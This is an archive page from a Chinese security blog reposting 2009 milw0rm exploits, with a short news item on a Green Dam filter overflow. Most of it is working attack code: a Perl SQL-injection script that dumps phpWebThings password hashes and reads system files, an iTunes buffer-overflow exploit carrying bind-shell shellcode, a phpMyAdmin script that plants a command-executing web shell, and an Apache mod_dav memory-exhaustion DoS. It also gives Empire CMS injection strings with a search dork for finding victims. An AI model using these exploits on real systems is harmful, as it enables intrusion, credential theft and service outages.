分类 "网络安全" 的存档.

绿坝3.17URL远程缓冲区溢出漏洞及利用文件下载

      绿坝远程缓冲区溢出漏洞及利用文件下载
      原文发表于此处:http://milw0rm.com/exploits/8938
      简单的翻译了一下:
      绿坝远程缓冲区溢出漏洞
      “绿坝”是由中国gov推广用来监控和反色情的软件。在7.1之后,所有中国新PC都必须强制安装绿坝。现在在中国已经有5000万使用者。
      为了监控用户正在浏览的URL,绿坝将自身注入浏览器进程。当绿坝试图处理一个较长的URL地址时,浏览器进程将出现堆栈溢出。
      此漏洞可以用于攻陷已经安装绿坝的IE。我用了.net库来编写代码,因为它比Heap Spray更加稳定,而且可以在Vista下绕过DEP(数据执行保护)和ASLR(内存分配技术)。
      此漏洞页包含一个.net控制,所以它应该被发布在IIS上。
                        —seer[N.N.U]
      下载文件 点击下载绿坝远程缓冲区溢出利用文件

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/172

帝国CMS留言板漏洞

      深灰丢出来的0day.
      找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
      例如:www.xxx.com/e/tool/gbook/?bid=1
      出来的是帝国CMS的留言本,在姓名处写:縗\
      联系邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
      提交后爆出账号密码
      测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1,然后依照上面方式留言,显示结果即爆出管理员帐号和密码md5值,破解密码登陆后台。
      只公布了oday的利用方法,并没有说明其中的一些原理,今天壮壮胆,跟大家分析一下
      1.这个漏洞就是php注入,上面的注入语句大家也看到了
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
      查询phome_enewsuser表段中username,password,rnd三个字段信息,查询的条件是userid=1,排在第一位的,估计也是管理员,当然如果网站存在多个管理员,可以把1换成其他数字
      2.姓名处写:縗\
      为什么要写:縗\?这里涉及到一个双字节漏洞
      要知道这个需要了解几个知识点
      1)如果安装过php环境的朋友应该知道,在php.ini中有一个get_magic_quotes_gpc功能
      当这个功能打开时,所有的 ' (单引号), " (双引号), \ (反斜线) and 空字符会自动加上转义符\
      当这个功能开启时,字符串可以直接入库
      2)注入大家知道,要用到“and” ,and被php转义为%df,由于 get_magic_quotes_gpc开启,所以自动加入了“\” ,“\"转换为十六进制后为%5C 。
      由于看出,其实我们输入“and”被php转义成为%df%5c
      但是当这些字符进入mysql数据库进行GBK编码时,就会被认为这是一个宽字符,也就是"縗"
      总结一下:
      %df'?==>? %df\'??==> ?%df%5c'??==> ?縗'
      这就是php中常见的宽字节漏洞,也称双字节漏洞
      如我们在平时的检测过程中替代原来的 and 1=1
      %df%27 or 1=1/*
      %df%27 or 1=2/*

      这里丢出一个某黑客网站的留言板地址:
      http://www.hackfield.com/e/tool/gbook/?bid=1
      来源:普瑞斯特(www.hacksb.cn)

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/173

phpWebThings <= 1.5.2 MD5 Hash恢复/文件公开远程漏洞

phpWebThings <= 1.5.2 MD5 Hash恢复/文件公开远程漏洞
注:
1,无论php.ini如何设置此漏洞都有效;
2,wt_config.php 包含mysql登录
简要说明:
phpWebThings包括一个可以让攻击者执行SQL注入攻击的缺陷。此问题由于fdown.php脚本未能恰当的处理用户提供输入的"id"变量引起。而这将可能允许攻击者注入或者执行后台数据库SQL请求。

#!/usr/bin/perl
                                                                                    
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit                        #
#                                                                                                 #
# by staker                                                                                       #
# ——————————                                                                  #
# mail: staker[at]hotmail[dot]it                                                                  #
# url: http://phpwebthings.nl                                                                     #
# ——————————                                                                  #
#                                                                                                 #                        
# NOTE:                                                                                           #
# 1. it works regardless of php.ini settings                                                      #
# 2. wt_config.php contains mysql login                                                           #
#                                                                                                 #
# short explanation:                                                                              #
# —————————————————-                                            #
# phpWebThings contains a flaw that allows an attacker                                            #
# to carry out an SQL injection attack. The issue is                  &
nbsp;                           #
# due to the fdown.php script not properly sanitizing                                             #
# user-supplied input to the 'id' variable. This may                                              #
# allow an attacker to inject or manipulate                                                       #
# SQL queries in the backend database (php.ini indep)                                             #
# —————————————————-                                            #
#                                                                                                 #
# [file: fdown.php]                                                                               #
# ————————————                                                            #
#                                                                                                 #
# <?php                                                                                           #
# include_once("core/main.php");                                                                  #
#                                                                                                 #
# $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); #
# $row = db_fetch_array($ret);                                                                    #
# header('HTTP/1.1 200 OK');                                                                      #
# header('Date: ' . date("D M j G:i:s T Y"));                                                     #
# header('Last-Modified: ' . date("D M j G:i:s T Y"));                                            #
# header("Content-Type: application/force-download");                                             #
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}")));               #
# header("Content-Transfer-Encoding: Binary");                                                    #
# header(&
#34;Content-Disposition: attachment; filename={$row["file"]}");                             #
# readfile("var/forumfiles/{$row["file"]}");                                                      #
#                                                                                                 #
# ?>                                                                                              #
#                                                                                                 #
# ————————————-                                                           #
#                                                                                                 #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1                                            #
# [*——————————————————————–*]                        #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]                        #
# [*——————————————————————–*]                        #
# [* Usage: perl web.pl [target + path] [OPTIONS]                       *]                        #
# [*                                                                    *]                        #
# [* Options:                                                           *]                        #
# [* [files] -d ../../../../../../etc/passwd                            *]                        #
# [* [hash.] -c user_id                                                 *]                        #
# [* [table] -t set a table prefix (default: wt)                        *]                        #
# [*——————————————————————–*]                        #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671                                                   #
#                                                                                                 #
# ———————————————————-  &
nbsp;                                   #
# Today is: 12 June 2009                                                                          #
# Location: Italy,Turin.                                                                          #  
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related                                      #
# ———————————————————-                                      #
###################################################################################################

use LWP::UserAgent;
use Getopt::Long;

&phpWebThings::init;

my ($files,$admin,$ua_lib,$domain,$table);

$domain  = $ARGV[0] || exit(0);

$ua_lib = LWP::UserAgent->new(
                               timeout      => 5,
                               max_redirect => 0,
                               agent        => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
                             ) || die $!;  

GetOptions(
           'p=s' => \$proxy,
           'd=s' => \$files,
           'c=i' => \$admin,
           't=s' => \$table,
         );
        

die(&phpWebThings::Exploit);
  

sub phpWebThings::Exploit()
{
       return Disclose::File($files) if defined $files;
       return Retrieve::Hash($admin) if defined $admin;
}      
              
      
sub Disclose::File
{
      my $filename = $_[0] || die $!;
      
      my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
      
      my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
      
      if ($response->status_line =~ /^(302|200|301)/) {
            return $response->content;
      }
      else {
            return $response->as_string;
      }            
}
      
sub Retrieve::Hash()
{
       my $user_id = $_[0] || die $!;
        
       my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
      
       my $prefix = (defined $table) ? $table : 'wt';
            
       my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1 UNION Select password FROM ${prefix}_users Where uid=$user_id#" ]);    
      
      if ($response->status_line =~ /^(302|200|301)/)
      {
            if ($response->content =~ /([0-9a-f]{32})/) {
                  return "[* MD5 Hash: $1\n";
            }        
      }
      else {
            return $response->as_string;
      }                          
}
          

sub Hex::convert()
{
       my $string = shift @_ || die $!;
      
       return unpack("H*",$string);
}      
        
      
sub parse::URL()
{
        my $string = shift @_ || die($!);
        
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
        
        return $string;

}

sub phpWebThings::init
{
       print  "[*——————————————————————–*]\n".
              "[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]\n".
              "[*——————————————————————–*]\n".
              "[* Usage: perl web.pl [target + path] [OPTIONS]                       *]\n".
              "[*                                                                    *]\n".
              "[* Options:                                                           *]\n".
              "[* [files] -d ../../../../../../etc/passwd                            *]\n".
              "[* [hash.] -c user_id                                                 *]\n".
              "[* [table] -t set a table prefix (default: wt)                        *]\n".
              "[*——————————————————————–*]\n";
}  

# milw0rm.com [2009-06-12]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/175

Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploi

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce – 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# – the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# – the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# –> hola hola ziplock, my Apple Guru! 😉 && cheers to muts… he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """
<html>
  <head><title>iTunes loading . . .</title>
  <script>
   function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
    prepareStack();
    ownSeh();
   }
   function main() {
    openiTunes();
    // Increase this timeout if your iTunes takes more time to load!
    setTimeout('ipwn()',20000);
   }
  </script>
  </head>
  <body onload="main();">
    <p align="center">
    <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
    </p>
    <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
    <p align="center"><b>www.offensive-security.com</b></p>
    <p align="center">
    iTunes starting… wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    function.
    <br/>
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    </h2>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>
    </p>
    </p>
  </body>
</html>"""

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
             "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
             "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
             "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
             "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
             "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
             "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
             "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
             "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
             "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
             "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
             "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570                                  

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin… Point EBP to encoded jmp                                                              
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x4
4" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                   "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3          = "\x43"*162                                  

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

# milw0rm.com [2009-06-12]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/176

绿坝发现安全漏洞 提醒谨防黑客攻击

  6月12日国外研究人员发现“绿坝——花季护航”软件存在安全漏洞,上述研究人员发现,该漏洞存在于“绿坝”过滤功能中,在开启绿坝过滤功能后,打开经过特别设置的网页,可以导致绿坝软件相关模块缓冲区溢出漏洞。

  根据介绍,黑客利用该溢出漏洞,可以利用“网页挂马”的方式传播病毒,中毒电脑存在严重泄密或被黑客远程控制的可能。

  据了解,目前通过各种途径安装“绿坝——花季护航”软件的用户已有5000万,这意味着至少5000万用户可能被黑客攻击,或成为黑客手中的“肉鸡”。

  经国内反病毒专家研究后表示,“绿坝—花季护航”确实存在上述漏洞,建议绿坝软件开发者能够尽快拿出补丁程序。在补丁出来之前,用户可以暂停使用绿坝的过滤功能。
  博主0point评:既然国外有人发现了这个漏洞,相信不久国内就会出现利用代码和工具,到时本为保障未成年人健康上网的软件就会让宿主电脑成为肉鸡,各位家长要多注意了。

  相关链接
  绿坝-花季护航软件遭破解 密码可绕开

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/177

phpMyAdmin (/scripts/setup.php) PHP 注入代码

      此漏洞代码在以下环境测试通过:
      phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;
      Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
      攻击环境要求:
      phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;
      此漏洞只针对采用向导模式安装的phpMyAdmin有效,而对采用手动安装的无效;
      管理员必须未删除"/phpMyAdmin/"目录下的"/config/"子目录,因为"/scripts/setup.php"尝试创建的下面PHP代码注入的"config.inc.php"文件正是在这个子目录下。

复制内容到剪贴板程序代码程序代码
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi

if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
           echo "on Debian/Ubuntu: sudo apt-get install curl"
           exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    
    echo "[+] attempting to inject phpinfo() …"
    curl -ks -b $2 -d "$postdata" –url "$3/scripts/setup.php" >/dev/null

    if curl -ks –url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks –url "$3/config/config.inc.php" >$flag    
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b $2 -d $postdata2 –url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo "    $3/config/config.inc.php?c=ls+-l+/"
        echo "    $3/config/config.inc.php?p=phpinfo();"
        echo "    please send any feedback/improvements for this script to"\
        "unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit
    fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar –url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided …"

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
    length=`echo -n $token | wc -c`

    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit $token $cookiejar $1
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi

# milw0rm.com [2009-06-09]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/179

Apache mod_dav / svn远程拒绝服务漏洞

利用此漏洞会耗尽系统所有内存资源。

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";    
}
print $sock "\r\n";
$x = <$sock>;    

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
    print;    
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);    
}

$a = "";
for ($i=1;$i<256;$i++) {        # Here you can increase the XML bomb count
    $k = $i-1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"foobar\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";    
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# milw0rm.com [2009-06-01]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/180